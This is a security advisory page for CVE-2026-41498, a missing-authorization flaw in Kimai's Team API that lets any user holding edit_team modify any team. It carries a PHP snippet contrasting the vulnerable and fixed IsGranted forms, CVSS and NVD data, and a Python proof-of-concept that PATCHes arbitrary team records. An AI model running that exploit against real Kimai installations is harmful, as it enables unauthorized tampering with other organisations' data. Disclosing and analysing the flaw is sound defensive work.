Security Vulnerability Report
CVE-2026-41498 CVSS 3.3 LOW

Published: 2026-05-08 04:16:15
Last Modified: 2026-05-08 22:16:30

Description

Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0.
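To make the root cause concrete, the following illustrative Symfony snippet (added here; it is not Kimai's code, and the entity, voter and controller names are assumptions) contrasts the two attribute forms named in the description. With `#[IsGranted('edit_team')]` no subject reaches the voter, so a voter that only supports entity-level attributes on a `Team` instance returns `false` from `supports()` and abstains; only the coarse permission check remains. Passing the controller argument as the subject with `#[IsGranted('edit', 'team')]` lets the voter decide per team.

```php
<?php
// Illustrative example, not Kimai's code: shows why the IsGranted form matters.
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Attribute\Route;
use Symfony\Component\Security\Core\Authentication\Token\TokenInterface;
use Symfony\Component\Security\Core\Authorization\Voter\Voter;
use Symfony\Component\Security\Http\Attribute\IsGranted;

// Hypothetical entity: a team and the user ids allowed to manage it.
final class Team
{
    /** @param int[] $teamleadIds */
    public function __construct(public readonly int $id, public readonly string $name, public readonly array $teamleadIds) {}
}

// Hypothetical voter modelled on the behaviour the advisory describes.
final class TeamVoter extends Voter
{
    protected function supports(string $attribute, mixed $subject): bool
    {
        // Only entity-level decisions on a concrete Team are handled here.
        // For the attribute 'edit_team' with a null subject this returns false,
        // so the voter abstains and never sees which team is being modified.
        return $attribute === 'edit' && $subject instanceof Team;
    }

    protected function voteOnAttribute(string $attribute, mixed $subject, TokenInterface $token): bool
    {
        $user = $token->getUser();
        if ($user === null || !method_exists($user, 'getId')) {
            return false;
        }
        // Ownership check: the caller must be a lead of this particular team.
        return in_array($user->getId(), $subject->teamleadIds, true);
    }
}

// Vulnerable pattern (pre-2.54.0 per the description): no subject is passed,
// so TeamVoter abstains. Anyone holding the edit_team permission may PATCH
// any team id.
final class TeamApiControllerBefore extends AbstractController
{
    #[Route('/api/teams/{id}', name: 'api_team_patch_before', methods: ['PATCH'])]
    #[IsGranted('edit_team')]
    public function patch(Team $team): Response
    {
        return $this->json(['id' => $team->id, 'name' => $team->name]);
    }
}

// Fixed pattern: the 'team' argument becomes the voter subject, so the
// entity-level ownership check in TeamVoter runs for the targeted team.
final class TeamApiControllerAfter extends AbstractController
{
    #[Route('/api/teams/{id}', name: 'api_team_patch_after', methods: ['PATCH'])]
    #[IsGranted('edit', 'team')]
    public function patch(Team $team): Response
    {
        return $this->json(['id' => $team->id, 'name' => $team->name]);
    }
}
```

A quick audit for this class of bug is to grep controllers for `IsGranted(` calls whose attribute name matches a voter's expected attribute but that pass no subject; every such site silently bypasses the voter's `supports()` check and falls back to the role or permission layer alone.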

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No NVD configuration data available. Affected range per the description:

Kimai < 2.54.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-41498
# Description: Exploits broken access control to modify arbitrary team data.
import requests


def exploit(target_url, team_id, attacker_token, new_team_name):
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "Content-Type": "application/ld+json",
    }
    # Target endpoint for a specific team
    url = f"{target_url}/api/teams/{team_id}"
    # Payload to update team details
    payload = {"name": new_team_name}
    try:
        # Sending PATCH request to modify the team
        response = requests.patch(url, json=payload, headers=headers)
        if response.status_code == 200:
            print(f"[+] Success: Team {team_id} renamed to '{new_team_name}'")
            print(f"[+] Response: {response.json()}")
        else:
            print(f"[-] Failed with status code {response.status_code}: {response.text}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


# Usage example
# exploit("http://localhost:8000", 5, "<valid_token_with_edit_team_perm>", "Hacked Team")
```

References

https://github.com/kimai/kimai/releases/tag/2.54.0
https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm

Weakness: CWE-862 (Missing Authorization)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41498", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:14.617", "lastModified": "2026-05-08T22:16:30.103", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/kimai/kimai/releases/tag/2.54.0", "source": "[email protected]"}, {"url": "https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm", "source": "[email protected]"}, {"url": "https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}